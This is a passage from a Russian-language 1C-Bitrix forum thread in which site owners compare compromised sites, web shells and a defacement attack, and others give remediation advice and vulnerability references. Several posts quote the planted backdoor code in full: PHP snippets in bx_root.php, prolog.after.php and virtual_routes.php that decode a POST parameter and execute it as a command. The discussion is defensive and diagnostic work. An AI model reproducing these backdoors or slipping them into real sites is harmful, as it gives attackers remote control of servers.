Разработчикам

Взломаны сайты в честь дня конституции украины

RSS

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#701

15.05.2023 17:54:35

Цитата
написал: в поиске C.A.S@shell выдает запрос, по сути открывает вот такое терминальное окно на базе команд linux

не понял - что это значит "в поиске C.A.S@shell выдает запрос" ?
т.е. любой человек может провалиться к Вам в такое терминальное окно и выполнить шелл команду?

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7193866

Заглянувший

Сообщений: 5 Регистрация: 15.05.2023

#702

15.05.2023 18:22:22

он появился у меня недавно, так понимаю в период аттаки на bitrix. Запрос в Яндексе выдает ссылку на сайт C.A.S@shell (polivalka.su) где содержится такой код же как в моем файле(.index.php). Любой человек может провалиться на эту ссылку которую я указал и выполнять свои запросы. Мне хотелось по подробнее, что позволяет выполнять такой терминал, для чего он?

Пользователь 7180340

Заглянувший

Сообщений: 6 Регистрация: 04.04.2023

REMADMIN

#703

15.05.2023 18:36:37

Цитата
написал: Мне хотелось по подробнее, что позволяет выполнять такой терминал, для чего он?

Так всё что угодно. Работать с файлами, базой и т.д. заливать новые, удалять, редактировать...

Удалённый системный администратор

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#704

15.05.2023 18:47:16

Цитата

написал:
он появился у меня недавно, так понимаю в период аттаки на bitrix. Запрос в Яндексе выдает ссылку на сайт C.A.S@shell (polivalka.su) где содержится такой код же как в моем файле(.index.php). Любой человек может провалиться на эту ссылку которую я указал и выполнять свои запросы. Мне хотелось по подробнее, что позволяет выполнять такой терминал, для чего он?

Вы я смотрю вообще отчаянный человек

я пока с помощью Вашего же шелла его у Вас переименовал, от греха подальше (в какой файл тут писать не буду, а то не все такие добрые как я)

это небольшая демонстрация того, что можно сделать

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#705

15.05.2023 18:49:58

Цитата

написал:

Цитата
написал: Мне хотелось по подробнее, что позволяет выполнять такой терминал, для чего он?

Так всё что угодно. Работать с файлами, базой и т.д. заливать новые, удалять, редактировать...

угу ... ограничено только правами пользователя под которым работает веб демон на данном сервере и не дай бог это расширенные права

хотя и обычных уже достаточно чтоб сайт наглухо стереть, да и сервак положить думаю тоже

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7193866

Заглянувший

Сообщений: 5 Регистрация: 15.05.2023

#706

15.05.2023 18:50:06

Цитата

написал:

Цитата
написал: Мне хотелось по подробнее, что позволяет выполнять такой терминал, для чего он?

Так всё что угодно. Работать с файлами, базой и т.д. заливать новые, удалять, редактировать...

буквально после моего сообщения, страницу удалили, очень оперативно кто то удалил

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#707

15.05.2023 18:53:33

Цитата
написал: Запрос в Яндексе выдает ссылку на сайт

какой запрос ссылку на шелл находит?
получается, что этот шелл Яндекс проиндексировал - значит на него какая то ссылка указывала

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7193866

Заглянувший

Сообщений: 5 Регистрация: 15.05.2023

#708

15.05.2023 18:57:37

Цитата

написал:

Цитата

Вы я смотрю вообще отчаянный человек
я пока с помощью Вашего же шелла его у Вас переименовал, от греха подальше (в какой файл тут писать не буду, а то не все такие добрые как я)

это небольшая демонстрация того, что можно сделать

это не мой shell и не мой сайт, но код такой же был на моем сайте. А поиск выдал быструю ссылку к этому терминалу на чужом сайте.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#709

15.05.2023 19:04:36

Цитата
написал: это не мой shell и не мой сайт, но код такой же был на моем сайте. А поиск выдал быструю ссылку к этому терминалу на чужом сайте.

ну смысл я думаю Вы поняли - шел он и в Африке шелл
фактически полный доступ к сайту (сайтам)

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7193866

Заглянувший

Сообщений: 5 Регистрация: 15.05.2023

#710

15.05.2023 19:12:42

Цитата

написал:

Цитата
написал: это не мой shell и не мой сайт, но код такой же был на моем сайте. А поиск выдал быструю ссылку к этому терминалу на чужом сайте.

ну смысл я думаю Вы поняли - шел он и в Африке шелл
фактически полный доступ к сайту (сайтам)

Да, уже почитал статьи на эту тему. Можно сказать временно уберегли сайт, но думаю этот терминал могут по новой залить, раз аналогичный код был залит и мне на днях.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#711

16.05.2023 04:39:07

Цитата
написал: Да, уже почитал статьи на эту тему. Можно сказать временно уберегли сайт, но думаю этот терминал могут по новой залить, раз аналогичный код был залит и мне на днях.

всё верно - ищите уязвимости с помощью которых залили шел
попробуйте начать с даты создания файла, посмотрите по этому времени логи - POST запросы
прогоните антивирусом, поищите по признакам (выше в ветке выкладывали)
если движек Битрикс - обновите до актуальной версии
так же не помешает система контроля версий и какой нибудь автоматический контроль изменений в файлах

Ps
я ещё в 16м году для своих нужд сваял скрипт контроля файловых изменений на сервере - до сих пор работает (по крону ночью - утром отчёт на мыло)
смотрю в свете последних событий скрипт довольно актуален

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#712

16.05.2023 04:49:01

Цитата
написал: Запрос в Яндексе выдает ссылку на сайт C.A.S@shell (polivalka.su) где содержится такой код же как в моем файле(.index.php). Любой человек может провалиться на эту ссылку которую я указал и выполнять свои запросы.

Кому интересны "кишки" шелла, а так же сингатуры для его поиска, забираем:
https://www.polivalka.su/manuals/cas-shell.php.txt

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 1875791

Заглянувший

Сообщений: 9 Регистрация: 07.06.2018

#713

16.05.2023 08:42:08

Цитата

написал:

Цитата

написал:

Цитата
написал: это не мой shell и не мой сайт, но код такой же был на моем сайте. А поиск выдал быструю ссылку к этому терминалу на чужом сайте.

ну смысл я думаю Вы поняли - шел он и в Африке шелл
фактически полный доступ к сайту (сайтам)

Дмитрий,

У 1С Битрикс были выявлены уязвимости в более старых версиях, в т.ч. в нашумевшем модуле голосования vote:

https://nvd.nist.gov/vuln/detail/CVE-2022-27228
https://bdu.fstec.ru/vul/2022-01141
https://github.com/cr1f/writeups/blob/main/attacking_bitrix.pdf
https://safe-surf.ru/upload/ALRT/ALRT-20220712.1.pdf

Эта бала одна из критических уязвимостей за последнее время. Багу пофиксили уже давно, начиная с версии v21.0.100 от 2022-03-04. Историю изменений модуля vote можно посмотреть тут. Текущая версия v23.0.0. Кроме того, тогда многие рекомендовали помимо обновления 1С Битрикс обновить PHP до 7.4. На самом деле, разработчики сейчас советуют обновить до 8.1, даже выпустили пошаговую инструкцию по обновлению версии PHP - https://helpdesk.bitrix24.ru/open/17332020/

В 2022 г была еще одна уязвимость CVE-2022-43959, но для её эксплуатации надо иметь сконфигурированное сопряжение с AD/LDAP и иметь административные права в 1С Битрикс. Но и эту проблему уже устранили в модуле ldap в версии v23.100.0 от 2023-02-19. Историю изменений можно посмотреть тут.

В целом, все изменения 1С Битрикс публикуются тут: https://dev.1c-bitrix.ru/docs/versions.php?lang=ru&module=ldap

Если смотреть текущие уязвимости, то свежих CVE пока на них нет, из чего можно сделать вывод, что пока все относительно тихо:
https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=Bitrix

Обновите свой 1С Битрикс.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#714

16.05.2023 08:46:23

Цитата
написал: Обновите свой 1С Битрикс.

к сожалению если сайт уже ломали, то 99% напихали бэкдоров которые придётся вычищать практически вручную

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7284364

Заглянувший

Сообщений: 1 Регистрация: 19.05.2023

#715

19.05.2023 12:18:54

Помогите, пожалуйста, вылезает проблема с авторизацией

Удаляю этот кусок кода из bx_root.php

Цитата
Используя ДРУГУЮ уязвимость поражают \bitrix\modules\main\bx_root.php дописывая в его конец это: <? if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "") parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2])))); ?>

и вот этот из prolog.after.php

Код

define("BX_CONTROLLER_CLIENT_X", base64_decode("QlhfVE9LRU4="));
if(isset($_POST[BX_CONTROLLER_CLIENT_X]) && !empty($_POST[BX_CONTROLLER_CLIENT_X])){$APPLICATION->RestartBuffer();CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0);die();}

После этого на сайт не получается авторизоваться, пишет в адресной строке https://сайт/auth/?login=yes и ничего не происходит, не выдает ошибок, все на том же окне авторизации. Если попытка войти в админку, то после "войти" черный экран фона админки и все

Если эти куски кода возвращаю - авторизация снова проходит в обычном режиме....куда еще нужно посмотреть? почему может быть такой эффект от удаления этого кода, которого изначально не было

жду помощи 🙏

Пользователь 6049485 Заглянувший Сообщений: 3 Регистрация: 28.02.2022	#716 24.05.2023 16:45:25 Добрый день! У нас взломали сайт, мы пытаемся его восстановить,может есть е кого ядро версии 20.0.650??? Очень надо или хотя бы папочку bitrix/admin/?

Пользователь 4551026

Заглянувший

Сообщений: 1 Регистрация: 31.08.2020

#717

26.05.2023 15:47:32

Добрый день! Никто сегодня не столкнулся со взломом сайта? Из симптомов - удалена папка bitrix, дефейс главной страницы с призывами от наших украинских соседей к смене власти в стране. Может быть кто-то в курсе, через какие уязвимости могли подобное осуществить?

Пользователь 162578

Заглянувший

Сообщений: 14 Баллов: 1 Регистрация: 12.02.2013

#718

26.05.2023 15:52:58

Цитата

написал:
Добрый день! Никто сегодня не столкнулся со взломом сайта? Из симптомов - удалена папка bitrix, дефейс главной страницы с призывами от наших украинских соседей к смене власти в стране. Может быть кто-то в курсе, через какие уязвимости могли подобное осуществить?

Взлом подтверждаю. Удалена папка bitrix. Пытаюсь восстановить из резервной копии

Пользователь 5517826

Посетитель

Сообщений: 69 Баллов: 9 Регистрация: 24.08.2021

#719

26.05.2023 15:56:33

Да. новая атака. Удаляют битрикс. Шаблон выносят в папку пользователя ( сама папка пустая как и содержимое ) ( на скриншоте таймвеб ). С битрикса остался только шаблон, самой системы нет. https://skr.sh/sK1uWdAQcFQ

Версия очень старая ( php 5.6 вроде на этом сайте вообще ) , на новых еще не приходили жалобы.

Рекомендую, у кого нет возможности, настроить хотя бы резервное копирование с хостинга/сервера.

Пользователь 1875791

Заглянувший

Сообщений: 9 Регистрация: 07.06.2018

#720

26.05.2023 15:59:15

Цитата

написал:
Да. новая атака. Удаляют битрикс. Шаблон выносят в папку пользователя ( сама папка пустая как и содержимое ) ( на скриншоте таймвеб ). С битрикса остался только шаблон, самой системы нет. https://skr.sh/sK1uWdAQcFQ

Версия очень старая ( php 5.6 вроде на этом сайте вообще ) , на новых еще не приходили жалобы.

Рекомендую, у кого нет возможности, настроить хотя бы резервное копирование с хостинга/сервера.

Какая версия битрикса? У вас точно не outdated? Что показывает security_scanner при после сканирования (покажите вывод)?

Пользователь 5517826 Посетитель Сообщений: 69 Баллов: 9 Регистрация: 24.08.2021	#721 26.05.2023 16:09:50 Да я восстановил уже, это не проблема. Он очень старый https://skr.sh/sK1qVJTAuts https://skr.sh/sK1232ar1Xj

Пользователь 2352755 Заглянувший Сообщений: 3 Регистрация: 01.08.2018	#722 26.05.2023 17:11:22 У нас у клиента тоже самое. Только php 8 и ядро последнее.

Пользователь 15617

Заглянувший

Сообщений: 1 Регистрация: 14.09.2007

#723

26.05.2023 17:26:33

Обнаружил такой файл, запуск был явно с него, но как он туда попал пока не понятно
/bitrix/virtual_routes.php

С таким содержимым

Код

function urlDecodeText($encodedText) {return urldecode(base64_decode(hex2bin($encodedText)));}

CModule::IncludeModule('controller');

$cache = $_POST['cache'];

if(isset($_POST['hash']) && $_POST['hash'] === '8qx1zzag1zxm6i9ulutq0gos4uo') $result = CControllerClient::RunCommand(urlDecodeText($cache), 0, 0);

Пользователь 7180340

Заглянувший

Сообщений: 6 Регистрация: 04.04.2023

REMADMIN

#724

26.05.2023 18:22:34

Тоже сегодня получил инфу о таком взломе.
Знаю, что версия Битрикса последняя. Но к сожалению у меня нет доступа ни к админке, ни к файлам, ни к логам. А логи изучить было бы очень интересно...

Удалённый системный администратор

Пользователь 6510870 Посетитель Сообщений: 3 Баллов: 5 Регистрация: 12.08.2022	#725 26.05.2023 18:47:12 Набросал статью с разбором сегодняшней атаки https://telegra.ph/hck-bx-0526-05-26

Взломаны сайты в честь дня конституции украины

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером